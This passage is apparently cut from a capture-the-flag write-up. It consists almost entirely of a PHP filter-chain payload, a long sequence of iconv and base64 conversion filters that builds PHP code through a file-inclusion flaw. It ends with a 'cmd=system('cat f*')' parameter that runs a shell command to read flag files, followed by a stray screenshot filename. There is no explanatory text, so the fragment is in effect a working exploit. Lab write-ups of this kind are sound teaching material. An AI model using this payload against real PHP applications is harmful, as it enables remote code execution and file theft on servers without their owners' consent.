4-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-
decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv
.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|c
onvert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|con
vert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.base64-decode|strin
g.strip_tags&cmd=system('cat f*');

image-20250204181628870